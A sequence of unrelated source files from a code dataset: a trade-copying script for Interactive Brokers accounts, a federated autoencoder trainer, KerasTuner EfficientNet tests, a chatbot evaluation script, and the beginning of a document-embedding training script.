Time:\", timeStamp)\n\n def accountDownloadEnd(self, accountName: str):\n super().accountDownloadEnd(accountName)\n print(\"AccountDownloadEnd. Account:\", accountName)\n # child_details[0]['all_positions']['FB']= 9.0\n # for child in child_details:\n # print(accountName,child[\"account_name\"],\";\",json.dumps(child['all_positions']))\n \n\n def orderStatus(self, orderId, status, filled, remaining, avgFullPrice, permId, parentId, lastFillPrice, clientId, whyHeld, mktCapPrice):\n # need to code cancelling orders here based on orderid (but need to first store pairs)\n print('orderStatus - orderid:', orderId, 'status:', status, 'filled', filled, 'remaining', remaining, 'lastFillPrice', lastFillPrice, 'clientid', clientId)\n \n if status == 'Cancelled' and orderId < 0:\n for child in child_details:\n for child_order_list in child['order_list']:\n if orderId in child_order_list:\n print(f'Cancelling Master Order Number {orderId}')\n print(f'Matching Child Order {child_order_list[0]}')\n child['app'].cancelOrder(child_order_list[0])\n \n \n def openOrder(self, orderId, contract, order, orderState):\n # Keagan Edit\n # When this is triggered can try to create order to other clients\n # print('openOrder id:', orderId, contract.symbol, contract.secType, '@', contract.exchange, ':', order.action, order.orderType, order.totalQuantity, orderState.status) \n order_str = f'Open Order to Child:\\n' + \\\n f'Master Order ID: {orderId}\\n' + \\\n f'Symbol: {contract.symbol} [ {contract.secType} @ {contract.exchange} ]\\n' + \\\n f'Action: {order.action} {order.totalQuantity} [{order.orderType}]\\n' + \\\n f'Status: {orderState.status}\\n\\n'\n totalQ = order.totalQuantity\n # # if orderState.status == 'PreSubmitted':\n # # pass\n # else:\n for child in child_details:\n if isinstance(child['app'].nextorderId, int) and orderId < 0:\n print(f'Manual Order Number {orderId} Received')\n if not have_order(child['order_list'], orderId):\n child['order_list'].append( [child['app'].nextorderId, orderId] )\n print(f'Child [{child[\"ip_address\"]}]: Manual Order ID {orderId} paired with {child[\"app\"].nextorderId}')\n print(f'Current Order Type: {order.orderType}')\n print(child['order_list'], '\\n\\n\\n')\n TQ = order.totalQuantity \n if contract.secType == \"STK\":\n if (contract.symbol in (child['binary_indicator'].keys())): #search dict for contract\n print('Found binary indicator')\n\n if (child['binary_indicator'].get(contract.symbol) == [0,0] or child['binary_indicator'].get(contract.symbol) == [1,1]): #if child has more position. 
Dont buy\n if((order.totalQuantity//child[\"risk_divide\"]) + (abs(master_details['positions'].get(contract.symbol))//child[\"risk_divide\"]) < abs(child['positions'].get(contract.symbol))):\n break\n\n if (order.action == 'BUY'):\n print(child['binary_indicator'].get(contract.symbol))\n\n if (child['binary_indicator'].get(contract.symbol) == [0,0]):\n if((order.totalQuantity//child[\"risk_divide\"]) + (master_details['positions'].get(contract.symbol)//child[\"risk_divide\"]) > child['positions'].get(contract.symbol)):\n order.totalQuantity = (order.totalQuantity//child[\"risk_divide\"]) + (master_details['positions'].get(contract.symbol)//child[\"risk_divide\"]) - child['positions'].get(contract.symbol)\n child['app'].placeOrder(child['app'].nextorderId, contract, order) #place order based on client 0 order\n child['app'].reqIds(child['app'].nextorderId)\n order.totalQuantity = totalQ\n \n if (child['binary_indicator'].get(contract.symbol) == [0,1]):\n if(order.totalQuantity <= abs(master_details['positions'].get(contract.symbol))):\n OA = order.action\n OT = order.orderType\n order.action = 'SELL'\n order.orderType = \"MKT\"\n order.totalQuantity = abs(child['positions'].get(contract.symbol))\n child['app'].placeOrder(child['app'].nextorderId, contract, order) #place order based on client 0 order\n child['app'].reqIds(child['app'].nextorderId)\n order.action = OA\n order.orderType = OT\n order.totalQuantity = totalQ\n\n if (child['binary_indicator'].get(contract.symbol) == [1,0]):\n order.totalQuantity = (order.totalQuantity//child[\"risk_divide\"]) + abs((master_details['positions'].get(contract.symbol))//child[\"risk_divide\"]) + abs(child['positions'].get(contract.symbol))\n child['app'].placeOrder(child['app'].nextorderId, contract, order) #place order based on client 0 order\n child['app'].reqIds(child['app'].nextorderId)\n order.totalQuantity = totalQ\n print('CBCBCBBCBCBCBCBBCBC', child['positions'].get(contract.symbol))\n\n if (child['binary_indicator'].get(contract.symbol) == [1,1]):\n if(TQ <= abs((master_details['positions'].get(contract.symbol)))):\n TQ = child['positions'].get(contract.symbol) * (TQ/master_details['positions'].get(contract.symbol))\n order.totalQuantity = round(TQ)\n child['app'].placeOrder(child['app'].nextorderId, contract, order) #place order based on client 0 order\n child['app'].reqIds(child['app'].nextorderId)\n order.totalQuantity = totalQ\n if(order.totalQuantity > abs(master_details['positions'].get(contract.symbol))):\n order.totalQuantity = ((order.totalQuantity - abs(master_details['positions'].get(contract.symbol)))//child[\"risk_divide\"]) + abs(child['positions'].get(contract.symbol))\n child['app'].placeOrder(child['app'].nextorderId, contract, order) #place order based on client 0 order\n child['app'].reqIds(child['app'].nextorderId)\n order.totalQuantity = totalQ\n\n\n\n if(order.action == 'SELL'):\n\n if(child['binary_indicator'].get(contract.symbol) == [0,0]):\n if(order.totalQuantity <= master_details['positions'].get(contract.symbol)):\n TQ = child['positions'].get(contract.symbol) * (TQ/master_details['positions'].get(contract.symbol))\n order.totalQuantity = round(TQ)\n print(\"testting\",TQ)\n child['app'].placeOrder(child['app'].nextorderId, contract, order) #place order based on client 0 order\n child['app'].reqIds(child['app'].nextorderId)\n order.totalQuantity = totalQ\n if(order.totalQuantity > master_details['positions'].get(contract.symbol)):\n order.totalQuantity = ((order.totalQuantity - 
master_details['positions'].get(contract.symbol))//child[\"risk_divide\"]) + child['positions'].get(contract.symbol)\n child['app'].placeOrder(child['app'].nextorderId, contract, order) #place order based on client 0 order\n child['app'].reqIds(child['app'].nextorderId)\n order.totalQuantity = totalQ\n\n if(child['binary_indicator'].get(contract.symbol) == [0,1]):\n order.totalQuantity = (order.totalQuantity//child[\"risk_divide\"]) + abs((master_details['positions'].get(contract.symbol))//child[\"risk_divide\"]) + abs(child['positions'].get(contract.symbol))\n child['app'].placeOrder(child['app'].nextorderId, contract, order) #place order based on client 0 order\n child['app'].reqIds(child['app'].nextorderId)\n order.totalQuantity = totalQ\n\n if(child['binary_indicator'].get(contract.symbol) == [1,0]):\n if(order.totalQuantity <= abs(master_details['positions'].get(contract.symbol))):\n OA = order.action\n OT = order.orderType\n order.action = 'BUY'\n order.orderType = \"MKT\"\n order.totalQuantity = abs(child['positions'].get(contract.symbol))\n child['app'].placeOrder(child['app'].nextorderId, contract, order) #place order based on client 0 order\n child['app'].reqIds(child['app'].nextorderId)\n order.action = OA\n order.orderType = OT\n order.totalQuantity = totalQ\n\n if(child['binary_indicator'].get(contract.symbol) == [1,1]):\n if((order.totalQuantity//child[\"risk_divide\"]) + (abs(master_details['positions'].get(contract.symbol))//child[\"risk_divide\"]) > abs(child['positions'].get(contract.symbol))):\n order.totalQuantity = (order.totalQuantity//child[\"risk_divide\"]) + (abs(master_details['positions'].get(contract.symbol))//child[\"risk_divide\"]) - abs(child['positions'].get(contract.symbol))\n child['app'].placeOrder(child['app'].nextorderId, contract, order) #place order based on client 0 order\n child['app'].reqIds(child['app'].nextorderId)\n order.totalQuantity = totalQ\n \n if(child['positions'].get(contract.symbol) is None):\n if (order.action == 'SELL' and master_details['positions'].get(contract.symbol) > 0): #check opposite directions \n break\n\n if (order.action == 'BUY' and master_details['positions'].get(contract.symbol) < 0): #check opposite directions \n break\n\n else:\n order.totalQuantity //= child[\"risk_divide\"] \n child['app'].placeOrder(child['app'].nextorderId, contract, order) \n child['app'].reqIds(child['app'].nextorderId) \n order.totalQuantity = totalQ\n\n if(child['positions'].get(contract.symbol) is not None):\n if (order.action == 'SELL' and (child['positions'].get(contract.symbol) == 0 and child['positions'].get(contract.symbol) - order.totalQuantity//child[\"risk_divide\"] < 0 and master_details['positions'].get(contract.symbol)) > 0): #check opposite directions \n break\n\n if (order.action == 'BUY' and (child['positions'].get(contract.symbol) == 0 and child['positions'].get(contract.symbol) + order.totalQuantity//child[\"risk_divide\"] > 0 and master_details['positions'].get(contract.symbol)) < 0):\n print('@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@')\n break\n\n else:\n order.totalQuantity //= child[\"risk_divide\"] #need to account for % mod values to prevent misallignment of position sizing (etc B>23 = 4child, B>22 = 4child. S> 22+23 = 45 = 9child. EXTRA ONE... so position -1 instead of 0)\n #regardless of -ve or +ve will reallign. if zero we go zero.\n \n #Wrote draft code in words. 
Will explain\n\n\n child['app'].placeOrder(child['app'].nextorderId, contract, order) #place order based on client 0 order\n child['app'].reqIds(child['app'].nextorderId) #reqID increments the next validId *some error.. the api calls this 3 times per trade i do. fking retard. might be because of the threading also. need to do some self check on -id\n order.totalQuantity = totalQ\n print(order_str)\n \n \n\n def execDetails(self, reqId, contract, execution):\n print('Order Executed: ', reqId, contract.symbol, contract.secType, contract.currency, execution.execId, execution.orderId, execution.shares, execution.lastLiquidity)\n\n# def buySwitch(x, totalQty, risk, CPOS, MPOS):\n# return {\n# '[0,0]': 1,\n# '[0,1]': 2,\n# '[1,0]': 1,\n# '[1,1]': 2\n# }.get(x, 9) # 9 is default if x not found (trying to use switch)\n \ndef have_order(child_list, orderId):\n if len(child_list) > 0:\n for order_pair in child_list:\n if orderId in order_pair:\n print(f'Order Number {orderId} Found!')\n return True\n return False\n \ndef child_connect(child_details):\n temp_app = IBapi(child_details['client_id'])\n temp_app.connect(child_details['ip_address'], child_details['port'], child_details['client_id'])\n temp_app.nextorderId = None\n \n temp_thread = threading.Thread(target=temp_app.run, daemon=True)\n temp_thread.start()\n time.sleep(3)\n \n while not isinstance(temp_app.nextorderId, int):\n print(f'Waiting for Child IP [{child_details[\"ip_address\"]}] Connection')\n time.sleep(1)\n print(f'Child IP [{child_details[\"ip_address\"]}] Connected')\n print(f'Child IP [{child_details[\"ip_address\"]}] Current Order: {temp_app.nextorderId}\\n\\n')\n \n return temp_app\n\n\n\nall_orders = []\n\n# Master TWS Settings\nmaster_details = {\n 'ip_address': '127.0.0.1',\n 'port': 7498,\n 'client_id': 0,\n 'account_name' : None,\n 'positions' : {}\n}\n\nmaster_app = IBapi(master_details['client_id'])\nmaster_app.connect(master_details['ip_address'], master_details['port'], master_details['client_id'])\nmaster_app.nextorderId = None\n\nmaster_thread = threading.Thread(target=master_app.run, daemon=True)\nmaster_thread.start()\ntime.sleep(3)\n\n# While there is no instance, continue while loop\nwhile not isinstance(master_app.nextorderId, int):\n print('Waiting for Master Connection')\n time.sleep(1)\nprint('Master Connected')\nprint(f'Master Current Order: {master_app.nextorderId}')\n\n\n# Child TWS Settings\n\nchild_details = [\n {\n 'ip_address': '220.255.254.206',\n 'port': 7499,\n 'client_id': 1,\n 'account_name' : None,\n 'risk_divide' : 5,\n \"positions\": {},\n 'binary_indicator' : {}\n },\n {\n 'ip_address': '127.0.0.1',\n 'port': 7501,\n 'client_id': 2,\n 'account_name' : None,\n 'risk_divide' : 10,\n \"positions\": {},\n 'binary_indicator' : {}\n }\n]\n\nfor i, child_det in enumerate(child_details):\n child_details[i]['app'] = child_connect(child_det)\n child_details[i]['order_list'] = []\n\nmaster_app.reqAutoOpenOrders(True) #this allows to know what orders are placed because orderid will show up -ve\n\nfor child in child_details:\n child['app'].reqAccountUpdates(True, child['app'].clientId)\n\nmaster_app.reqAccountUpdates(True, master_app.clientId)# request postions will call updatePortfolio()\n\ntime.sleep(3)\n\nfor child in child_details: #gets the difference in dict to find positions not the same\n A = list(child['positions'].keys())\n B = list(master_details['positions'].keys())\n commonKeys = set(A) - (set(A) - set(B))\n for key in commonKeys:\n if((child['positions'][key]) * child['risk_divide'] != 
(master_details['positions'][key])):\n print(key ,\":\" ,(child['positions'][key]) , \" should be \" , (master_details['positions'][key]), \"risk mul:\", child['risk_divide'])\n \n if((child['positions'][key]) > 0 and master_details['positions'][key] > 0 ): #give binary to child\n child['binary_indicator'][key] = [0,0]\n \n if((child['positions'][key]) > 0 and master_details['positions'][key] < 0 ):\n child['binary_indicator'][key] = [0,1]\n if((child['positions'][key]) < 0 and master_details['positions'][key] > 0 ):\n child['binary_indicator'][key] = [1,0]\n if((child['positions'][key]) < 0 and master_details['positions'][key] < 0 ):\n child['binary_indicator'][key] = [1,1] \n\nfor child in child_details:\n print(json.dumps(child['binary_indicator']))\n print(json.dumps(child['positions']))\n\nprint(json.dumps(master_details['positions']))","sub_path":"tests/working_code.py","file_name":"working_code.py","file_ext":"py","file_size_in_byte":22550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"223190320","text":"import logging\r\n\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn as nn\r\n# import wandb\r\nimport os\r\nimport joblib\r\n\r\nfrom matplotlib import pyplot as plt\r\nfrom FedML.fedml_core.trainer.model_trainer import ModelTrainer\r\n\r\n\r\nclass AETrainer(ModelTrainer):\r\n def get_model_params(self):\r\n return self.model.cpu().state_dict()\r\n\r\n def set_model_params(self, model_parameters):\r\n self.model.load_state_dict(model_parameters)\r\n\r\n def train(self, train_data, device, args):\r\n logging.info(device)\r\n model = self.model.to(device)\r\n model.train()\r\n optimizer = torch.optim.Adam(model.parameters(), lr=args.lr)\r\n loss_func = torch.nn.MSELoss()\r\n # model training\r\n for epoch in range(args.epochs):\r\n\r\n # mini- batch loop\r\n epoch_loss = 0.0\r\n for idx, inp in enumerate(train_data):\r\n # if idx < round(len(train_data) * 2 / 3):\r\n inp = inp.to(device)\r\n optimizer.zero_grad()\r\n decode = model(inp)\r\n loss = loss_func(decode, inp)\r\n # epoch_loss += loss.item() / args.batch_size\r\n loss.backward()\r\n optimizer.step()\r\n # logging.info('Epoch training complete')\r\n\r\n def test(self, test_data, device, args):\r\n pass\r\n\r\n def test_local(self, client_index, threshold, train_data, test_data, device, args):\r\n # pass\r\n model = self.model.to(device)\r\n self.model.eval()\r\n\r\n true_negative = []\r\n false_positive = []\r\n true_positive = []\r\n false_negative = []\r\n thres_func = nn.MSELoss()\r\n\r\n for idx, inp in enumerate(train_data):\r\n if idx >= round(len(train_data) * 2 / 3):\r\n inp = inp.to(device)\r\n diff = thres_func(model(inp), inp)\r\n mse = diff.item()\r\n if mse > threshold:\r\n false_positive.append(idx)\r\n else:\r\n true_negative.append(idx)\r\n\r\n for idx, inp in enumerate(test_data):\r\n inp = inp.to(device)\r\n diff = thres_func(model(inp), inp)\r\n mse = diff.item()\r\n if mse > threshold:\r\n true_positive.append(idx)\r\n else:\r\n false_negative.append(idx)\r\n\r\n # print(len(true_positive))\r\n # print(len(false_positive))\r\n\r\n accuracy = (len(true_positive) + len(true_negative)) \\\r\n / (len(true_positive) + len(true_negative) + len(false_positive) + len(false_negative))\r\n precision = len(true_positive) / (len(true_positive) + len(false_positive))\r\n false_positive_rate = len(false_positive) / (len(false_positive) + len(true_negative))\r\n\r\n logging.info('client_index = %d, The threshold is %f' % (client_index, threshold))\r\n 
logging.info('client_index = %d, The True negative number is %f' % (client_index, len(true_negative)))\r\n logging.info('client_index = %d, The False positive number is %f' % (client_index, len(false_positive)))\r\n logging.info('client_index = %d, The True positive number is %f' % (client_index, len(true_positive)))\r\n logging.info('client_index = %d, The False negative number is %f' % (client_index, len(false_negative)))\r\n logging.info('client_index = %d, The accuracy is %f' % (client_index, accuracy))\r\n logging.info('client_index = %d, The precision is %f' % (client_index, precision))\r\n logging.info('client_index = %d, The false positive rate is %f' % (client_index, false_positive_rate))\r\n\r\n return accuracy, precision, false_positive_rate\r\n\r\n def test_on_the_server(self, train_data_local_dict, test_data_local_dict, device, args=None):\r\n # logging.info(device)\r\n # mse_results_global = []\r\n # threshold_dict = {}\r\n # thres_func = nn.MSELoss()\r\n # #\r\n # # opt_threshold = [round(4955.0 * 0.67 / args.batch_size), round(1311.0 * 0.67 / args.batch_size),\r\n # # round(3910.0 * 0.67 / args.batch_size), round(17524.0 * 0.67 / args.batch_size),\r\n # # round(6215.0 * 0.67 / args.batch_size), round(9851.0 * 0.67 / args.batch_size),\r\n # # round(5215.0 * 0.67 / args.batch_size), round(4658.0 * 0.67 / args.batch_size),\r\n # # round(1953.0 * 0.67 / args.batch_size)]\r\n # #\r\n # # test_threshold = 1000\r\n #\r\n # for client_index in train_data_local_dict.keys():\r\n # opt_data = train_data_local_dict[client_index]\r\n # mse_results_per_client = []\r\n # self.model.eval()\r\n # for idx, inp in enumerate(opt_data):\r\n # if idx >= round(len(opt_data) * 2 / 3):\r\n # inp = inp.to(device)\r\n # decode = self.model(inp)\r\n # diff = thres_func(decode, inp)\r\n # mse = diff.item()\r\n # mse_results_per_client.append(mse)\r\n # mse_results_global.append(mse)\r\n # mse_results_per_client = torch.tensor(mse_results_per_client)\r\n # threshold_dict[client_index] = torch.mean(mse_results_per_client) + 1 * torch.std(mse_results_per_client) / np.sqrt(\r\n # args.batch_size)\r\n #\r\n # # threshold_path = os.path.join(\"/Users/ultraz/PycharmProjects/FedML-IoT-V/experiments/distributed\", 'threshold_dict.pkl')\r\n # # joblib.dump(threshold_dict, threshold_path)\r\n #\r\n #\r\n # mse_results_global = torch.tensor(mse_results_global)\r\n # threshold_global =torch.mean(mse_results_global) + 1 * torch.std(mse_results_global)/ np.sqrt(args.batch_size)\r\n # logging.info('The threshold is %f' % (threshold_global))\r\n #\r\n # accuracy_array_global = []\r\n # precision_array_global = []\r\n # fpr_array_global = []\r\n #\r\n # for client_index in test_data_local_dict.keys():\r\n # test_data = test_data_local_dict[client_index]\r\n # # using global threshold for test\r\n # # [accuracy_client, precision_client, fpr_client] = self.test_local(client_index,\r\n # # (test_threshold[client_index] / 2), threshold_global, test_data, device, args)\r\n # [accuracy_client, precision_client, fpr_client] = self.test_local(client_index, threshold_global, train_data_local_dict[client_index], test_data, device, args)\r\n # accuracy_array_global.append(accuracy_client)\r\n # precision_array_global.append(precision_client)\r\n # fpr_array_global.append(fpr_client)\r\n\r\n model_save_dir = \"../../training\"\r\n path = os.path.join(model_save_dir, 'model.ckpt')\r\n torch.save(self.model.state_dict(), path)\r\n\r\n return 
True","sub_path":"training/ae_trainer.py","file_name":"ae_trainer.py","file_ext":"py","file_size_in_byte":6953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"252704653","text":"# Copyright 2019 The KerasTuner Authors\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Tests for HyperEfficientNet Model.\"\"\"\n\nimport numpy as np\nimport pytest\nimport tensorflow as tf\nfrom packaging.version import parse\n\nfrom keras_tuner.applications import efficientnet\nfrom keras_tuner.engine import hypermodel as hm_module\nfrom keras_tuner.engine import hyperparameters as hp_module\n\n\n@pytest.mark.skipif(\n parse(tf.__version__) < parse(\"2.3.0\"),\n reason=\"Preprocessing layers and \"\n \"applications.efficientnet only exist in TF2.3+.\",\n)\n@pytest.mark.parametrize(\"version\", [\"B0\", \"B1\"])\ndef test_model_construction(version):\n hp = hp_module.HyperParameters()\n hp.Choice(\"version\", [version])\n hypermodel = efficientnet.HyperEfficientNet(\n input_shape=(32, 32, 3), classes=10\n )\n model = hypermodel.build(hp)\n assert hp.values[\"version\"] == version\n assert model.layers\n assert model.name == \"EfficientNet\"\n assert model.output_shape == (None, 10)\n model.train_on_batch(np.ones((1, 32, 32, 3)), np.ones((1, 10)))\n out = model.predict(np.ones((1, 32, 32, 3)))\n assert out.shape == (1, 10)\n\n\ndef test_tf_version_too_low_error():\n pp_module = efficientnet.preprocessing\n efficientnet.preprocessing = None\n\n with pytest.raises(ImportError, match=\"HyperEfficientNet requires\"):\n efficientnet.HyperEfficientNet()\n\n efficientnet.preprocessing = pp_module\n\n\n@pytest.mark.skipif(\n parse(tf.__version__) < parse(\"2.3.0\"),\n reason=\"Preprocessing layers and \"\n \"applications.efficientnet only exist in TF2.3+.\",\n)\ndef test_hyperparameter_existence_and_defaults():\n hp = hp_module.HyperParameters()\n hypermodel = efficientnet.HyperEfficientNet(\n input_shape=(224, 224, 3), classes=10\n )\n hypermodel.build(hp)\n assert hp.get(\"version\") == \"B0\"\n assert hp.get(\"top_dropout_rate\") == 0.2\n assert hp.get(\"learning_rate\") == 0.01\n assert hp.get(\"pooling\") == \"avg\"\n\n\n@pytest.mark.skipif(\n parse(tf.__version__) < parse(\"2.3.0\"),\n reason=\"Preprocessing layers and \"\n \"applications.efficientnet only exist in TF2.3+.\",\n)\ndef test_hyperparameter_override():\n hp = hp_module.HyperParameters()\n hp.Choice(\"version\", [\"B1\"])\n hp.Fixed(\"top_dropout_rate\", 0.5)\n hypermodel = efficientnet.HyperEfficientNet(\n input_shape=(256, 256, 3), classes=10\n )\n hypermodel.build(hp)\n assert hp.get(\"version\") == \"B1\"\n assert hp.get(\"top_dropout_rate\") == 0.5\n\n\n@pytest.mark.skipif(\n parse(tf.__version__) < parse(\"2.3.0\"),\n reason=\"Preprocessing layers and \"\n \"applications.efficientnet only exist in TF2.3+.\",\n)\ndef test_input_tensor():\n hp = hp_module.HyperParameters()\n inputs = tf.keras.Input(shape=(256, 256, 3))\n hypermodel = efficientnet.HyperEfficientNet(input_tensor=inputs, 
classes=10)\n model = hypermodel.build(hp)\n assert model.inputs == [inputs]\n\n\n@pytest.mark.skipif(\n parse(tf.__version__) < parse(\"2.3.0\"),\n reason=\"Preprocessing layers and \"\n \"applications.efficientnet only exist in TF2.3+.\",\n)\ndef test_override_compiling_phase():\n class MyHyperEfficientNet(efficientnet.HyperEfficientNet):\n def _compile(self, model, hp):\n learning_rate = 0.1\n optimizer_name = hp.Choice(\n \"optimizer\", [\"adam\", \"sgd\"], default=\"adam\"\n )\n if optimizer_name == \"sgd\":\n optimizer = tf.keras.optimizers.SGD(\n momentum=0.1, learning_rate=learning_rate\n )\n elif optimizer_name == \"adam\":\n optimizer = tf.keras.optimizers.Adam(\n learning_rate=learning_rate\n )\n model.compile(\n optimizer=optimizer,\n loss=\"categorical_crossentropy\",\n metrics=[\"accuracy\"],\n )\n\n hp = hp_module.HyperParameters()\n hypermodel = MyHyperEfficientNet(input_shape=(32, 32, 3), classes=5)\n hypermodel.build(hp)\n assert \"learning_rate\" not in hp.values\n assert hp.values[\"optimizer\"] == \"adam\"\n\n\n@pytest.mark.skipif(\n parse(tf.__version__) < parse(\"2.3.0\"),\n reason=\"Preprocessing layers and \"\n \"applications.efficientnet only exist in TF2.3+.\",\n)\ndef test_augmentation_param_invalid_input():\n with pytest.raises(ValueError):\n efficientnet.HyperEfficientNet(\n input_shape=(32, 32, 3), classes=10, augmentation_model=0\n )\n\n\n@pytest.mark.skipif(\n parse(tf.__version__) < parse(\"2.3.0\"),\n reason=\"Preprocessing layers and \"\n \"applications.efficientnet only exist in TF2.3+.\",\n)\ndef test_augmentation_param_fixed_model():\n hp = hp_module.HyperParameters()\n aug_model = tf.keras.Sequential(name=\"aug\")\n hypermodel = efficientnet.HyperEfficientNet(\n input_shape=(32, 32, 3), classes=10, augmentation_model=aug_model\n )\n model = hypermodel.build(hp)\n assert model.layers[1].name == \"aug\"\n\n\n@pytest.mark.skipif(\n parse(tf.__version__) < parse(\"2.3.0\"),\n reason=\"Preprocessing layers and \"\n \"applications.efficientnet only exist in TF2.3+.\",\n)\ndef test_augmentation_param_hyper_model():\n class HyperAug(hm_module.HyperModel):\n def build(self, hp):\n model = tf.keras.Sequential(name=\"aug\")\n scaling_factor = hp.Choice(\"scaling_factor\", [1])\n model.add(tf.keras.layers.Lambda(lambda x: x * scaling_factor))\n return model\n\n hp = hp_module.HyperParameters()\n aug_hm = HyperAug()\n hypermodel = efficientnet.HyperEfficientNet(\n input_shape=(32, 32, 3), classes=10, augmentation_model=aug_hm\n )\n model = hypermodel.build(hp)\n assert model.layers[1].name == \"aug\"\n assert hp.values[\"scaling_factor\"] == 1\n\n\n@pytest.mark.skipif(\n parse(tf.__version__) < parse(\"2.3.0\"),\n reason=\"Preprocessing layers and \"\n \"applications.efficientnet only exist in TF2.3+.\",\n)\ndef test_pooling_is_max():\n hp = hp_module.HyperParameters()\n hp.values[\"pooling\"] = \"max\"\n hypermodel = efficientnet.HyperEfficientNet(\n input_shape=(32, 32, 3), classes=10\n )\n hypermodel.build(hp)\n\n\n@pytest.mark.skipif(\n parse(tf.__version__) < parse(\"2.3.0\"),\n reason=\"Preprocessing layers and \"\n \"applications.efficientnet only exist in TF2.3+.\",\n)\ndef test_no_classes_raise_error():\n with pytest.raises(ValueError, match=\"classes\"):\n efficientnet.HyperEfficientNet(input_shape=(32, 32, 3))\n\n\n@pytest.mark.skipif(\n parse(tf.__version__) < parse(\"2.3.0\"),\n reason=\"Preprocessing layers and \"\n \"applications.efficientnet only exist in TF2.3+.\",\n)\ndef test_no_input_shape_tensor_raise_error():\n with pytest.raises(ValueError, 
match=\"input_tensor\"):\n efficientnet.HyperEfficientNet(classes=10)\n","sub_path":"keras_tuner/applications/efficientnet_test.py","file_name":"efficientnet_test.py","file_ext":"py","file_size_in_byte":7248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"106486077","text":"from keras.models import load_model\nimport json\nimport nltk\nimport numpy as np\nimport pickle\nimport helpers\n\nmodel = load_model('chatbot_model.h5')\nnltk.download('punkt')\n\nintents = json.loads(open('intents.json').read())\nwords = pickle.load(open('words.pkl', 'rb'))\nclasses = pickle.load(open('classes.pkl', 'rb'))\n\n# return bag of words array: 0 or 1 for each word in the bag that exists in the sentence\n\ndef bag_of_words(sentence, words, show_details=True):\n # tokenize the pattern\n sentence_words = helpers.preprocess_text(sentence)\n # bag of words - matrix of N words, vocabulary matrix\n bag = [0]*len(words)\n for s in sentence_words:\n for i, w in enumerate(words):\n if w == s:\n # assign 1 if current word is in the vocabulary position\n bag[i] = 1\n if show_details:\n print(\"found in bag: %s\" % w)\n return(np.array(bag))\n\ndef predict_class(sentence, model):\n p = bag_of_words(sentence, words, show_details=False)\n predictions = model.predict(np.array([p]))[0]\n\n # filter out predictions below a threshold\n error_threshold = 0.15\n results = [[i, r] for i, r in enumerate(predictions) if r > error_threshold]\n\n # sort by strength of probability\n results.sort(key=lambda x: x[1], reverse=True)\n\n return list(map(lambda x: {\n \"intent\": classes[x[0]],\n \"probability\": str(x[1])\n }, results))\n\ndef chatbot_response(msg):\n predictions = predict_class(msg, model)\n post_ids = list(map(lambda prediction: prediction['intent'], predictions))\n return post_ids if len(predictions) > 0 else False\n\nif __name__ == \"__main__\":\n with open('../dataset.json', 'r') as dataset_file:\n dataset = json.load(dataset_file)\n\n successes = 0\n partial_success = 0\n matches = 0\n for (post_id, post) in dataset.items():\n test_title = post['Children'][0]['Title'] + ' ' + ' '.join(post['Children'][0]['Tags'] + post['Children'][0]['BodyTokens'])\n response = chatbot_response(test_title)\n if response is not False:\n matches += 1\n success = response[0] == post_id\n # print(f\"{response}, success: {response == row['Id']}\")\n\n if success:\n successes += 1\n elif post_id in response:\n partial_success += 1\n else:\n print(f\"{response}, {test_title}, success: {response == post_id}\")\n for child in dataset[post_id]['Children']:\n print(child['Title'], child['Tags'])\n print('-' * 10)\n for child in dataset[response[0]]['Children']:\n print(child['Title'], child['Tags'])\n print()\n\n else:\n print(f\"Failed to find response {post_id}: '{test_title}'\")\n print(helpers.preprocess_text(test_title))\n\n\n print(f\"{successes} successes\")\n print(f\"{successes / len(dataset)} success rate\")\n\n print(f\"{partial_success} partial successes\")\n print(f\"{partial_success / (matches - successes)} partial success rate\")\n\n print(f\"{matches} matches\")\n print(f\"{successes / matches} match success rate\")\n\n print(f\"{matches / len(dataset)} match rate\")","sub_path":"keras/check_model.py","file_name":"check_model.py","file_ext":"py","file_size_in_byte":3243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"82613847","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue 3/17 17:07:40 2017\n\n@author: 
duocai\"\"\"\n\nimport numpy as np\nimport json\nimport math\nimport datetime\nimport random\nimport doc_manager as dm\n\n# hyperparameters\n# window size\nwindow = 5\n# learning rate\nstart_alpha = 0.03\n# clamp on the dot product: beyond this range the sigmoid saturates, so the update can be dropped\nMAX_EXP = 10\n# vector dimensionality\nlayer_size = 100\n\n# internal parameter\ndoc_num = 0\nunit_num = 0\n# word (unit) vector table\nword_vec_table = {}\n# document vector table\ndoc_vec_table = {}\n# parameter table; the parameter count, i.e. the number of internal nodes, is the number of leaves (unit_num) - 1, initialized from a normal distribution\npara_table = {}\n# all users, treated as documents\ndocs = {}\n# all places, treated as words\nwords_tree = {}\n# the index of the doc in the doc_vec_table\ndoc_index = {}\n# the index of the word in the word_vec_table\nword_index = {}\n# start time\nstart_time = datetime.datetime.now()\n# iteration time\ntrain_num = 0\n\n\ndef init_data(doc_path, words_path):\n    if not (doc_path and words_path):\n        print('please fill doc_path and words_path')\n        exit()\n    global docs\n    global words_tree\n    # default 'data/movielen/handled/doc.txt'\n    docs = dm.read_handled_data(doc_path)\n    # default 'data/movielen/handled/tree.txt'\n    words_tree = dm.read_handled_data(words_path)\n\n\ndef init_basic_parameter(p_layer_size=layer_size, p_window_size=window,\n                         p_learn_alpha=start_alpha, p_MAX_EXP=MAX_EXP):\n    global docs\n    global words_tree\n    if docs == {} or words_tree == {}:\n        print('Err: please init data with doc_path and words_path first')\n        exit()\n\n    global layer_size\n    global window\n    global MAX_EXP\n    global start_alpha\n    layer_size = p_layer_size\n    window = p_window_size\n    MAX_EXP = p_MAX_EXP\n    start_alpha = p_learn_alpha\n\n    global unit_num\n    global doc_num\n    unit_num = len(words_tree)\n    doc_num = len(docs)\n    global para_table\n    global 